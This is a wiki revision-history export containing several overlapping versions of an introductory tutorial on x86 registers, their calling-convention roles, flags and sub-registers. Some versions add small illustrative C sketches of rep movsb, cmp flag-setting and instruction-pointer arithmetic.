Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, keep the counter variable in ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it until it reaches 0. This class of instruction will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
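<br />
To show how esi, edi and ecx work together, here is a small C model of a "rep-" copy such as ''rep movsb''. It is only a sketch: the struct and function names are made up, and it assumes the copy runs forwards (the direction flag is clear), moving one byte per step.<br />

```c
#include <stdint.h>

/* Illustrative stand-ins for the three registers a "rep-" copy uses. */
struct copy_regs {
    const uint8_t *esi; /* source pointer */
    uint8_t *edi;       /* destination pointer */
    uint32_t ecx;       /* number of bytes left to copy */
};

/* Hypothetical model of "rep movsb": copy one byte from [esi] to [edi],
 * advance both pointers, decrement ecx, and repeat until ecx is 0. */
void rep_movsb(struct copy_regs *r)
{
    while (r->ecx != 0) {
        *r->edi = *r->esi;
        r->esi++;
        r->edi++;
        r->ecx--;
    }
}
```

After the loop, ecx is 0 and both pointers sit just past the data that was copied.<br />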
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, and stack variables are referenced relative to esp instead, even though esp moves as values are pushed and popped (which gets confusing; luckily, IDA automatically detects and corrects for a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack (the stack grows towards lower addresses, so the top is at the lowest address in use). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning; together they store meta-information about the results of previous operations, for example whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register usually centers on the ''cmp'' and ''test'' instructions, which set or clear the zero, carry and overflow flags.<br />
These flags are then tested by a conditional jump, which may be controlling program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers is that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit register also changes the 32-bit register. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships between these registers are shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32 bits of edx are put in front of the 32 bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3156Registers2012-01-16T03:18:30Z<p>Killboy: /* flags */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. Registers are where most math is done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code; registers are not preserved automatically (although in some assembly languages they are, but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, keep the counter variable in ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it until it reaches 0. This class of instruction will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, and stack variables are referenced relative to esp instead, even though esp moves as values are pushed and popped (which gets confusing; luckily, IDA automatically detects and corrects for a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack (the stack grows towards lower addresses, so the top is at the lowest address in use). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers is that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit register also changes the 32-bit register. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships between these registers are shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32 bits of edx are put in front of the 32 bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3155Registers2012-01-16T03:15:59Z<p>Killboy: /* 16-bit and 8-bit Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. Most math (addition, subtraction, etc.) is done in registers, although x86 also lets many instructions operate directly on a value in memory. Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code; registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
ecx is also often used as a loop counter. ''for'' loops generally, although not always, keep the loop counter in ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of instruction will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
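<br />
The roles of ecx, esi and edi in a ''rep-'' instruction can be sketched in C. This is only a rough model of what ''rep movsb'' does, assuming the direction flag is clear so that the pointers move forward; the function name rep_movsb and its parameter names are made up for illustration and simply mirror the registers. <br />

```c
#include <stddef.h>
#include <stdint.h>

/* Rough model of "rep movsb": copy ecx bytes from [esi] to [edi].
 * Assumes the direction flag is clear (pointers advance upwards). */
static void rep_movsb(uint8_t *edi, const uint8_t *esi, size_t ecx)
{
    while (ecx != 0) {
        *edi++ = *esi++;   /* movsb: copy one byte, advance both pointers */
        ecx--;             /* rep: decrement the counter until it hits 0 */
    }
}
```

Calling rep_movsb(dst, src, 4) copies four bytes from src to dst, just as the instruction would with esi = src, edi = dst and ecx = 4. <br />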
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while variables on the stack are referenced relative to the stack pointer, which moves throughout the function (this gets confusing -- luckily, IDA automatically detects and corrects for a moving stack pointer!).<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack, which is the lowest address in use because the stack grows towards lower addresses. Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning, and the bits store meta-information about the results of previous operations: for example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations, which commonly set or clear the zero, carry and overflow flags.<br />
These flags are then tested by a conditional jump, which may control program flow or a loop.<br />
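<br />
To make the flags more concrete, here is a small C sketch of how ''cmp a, b'' could be modelled: it subtracts b from a, throws the result away, and keeps only the flags. The struct and function names (flags, cmp32) are invented for this example, and only the zero, carry and overflow flags are modelled. <br />

```c
#include <stdint.h>

/* Hypothetical container for the three flags discussed in this section. */
struct flags {
    int zf;   /* zero flag:     result was 0, i.e. the operands were equal */
    int cf;   /* carry flag:    unsigned borrow, i.e. a < b as unsigned    */
    int of;   /* overflow flag: the signed result did not fit in 32 bits   */
};

/* Rough model of "cmp a, b": compute a - b, discard it, keep the flags. */
static struct flags cmp32(uint32_t a, uint32_t b)
{
    uint32_t r = a - b;   /* unsigned subtraction wraps modulo 2^32 */
    struct flags f;

    f.zf = (r == 0);
    f.cf = (a < b);
    /* Signed overflow on subtraction: the operands have different signs
     * and the sign of the result differs from the sign of a. */
    f.of = (int)((((a ^ b) & (a ^ r)) >> 31) & 1u);
    return f;
}
```

A conditional jump such as ''jz'' then corresponds to checking f.zf, and an unsigned "below" jump such as ''jb'' corresponds to checking f.cf. <br />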
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
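The arithmetic in the listing above can be written out as a short C sketch. The instruction lengths are taken from the byte counts in the listing; the function name eip_after and the starting address used below are assumptions made for illustration. <br />

```c
#include <stddef.h>
#include <stdint.h>

/* Lengths, in bytes, of the five instructions in the listing above:
 * push ebx / mov edx,[esp+arg_0] / xor ebx,ebx / mov ebx,edx / lea eax,[edx+7] */
static const uint8_t insn_len[] = { 1, 4, 2, 2, 3 };

/* Return the value of eip after the first n instructions have executed,
 * given that the first instruction starts at address start. */
static uint32_t eip_after(uint32_t start, size_t n)
{
    uint32_t eip = start;
    size_t count = sizeof insn_len / sizeof insn_len[0];

    for (size_t i = 0; i < n && i < count; i++)
        eip += insn_len[i];   /* the CPU adds each instruction's size */
    return eip;
}
```

With a made-up starting address of 0x00401000, eip_after(0x00401000, 5) gives 0x0040100C, since the five instructions occupy 1 + 4 + 2 + 2 + 3 = 12 bytes. <br />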
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers is that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships between these registers are shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
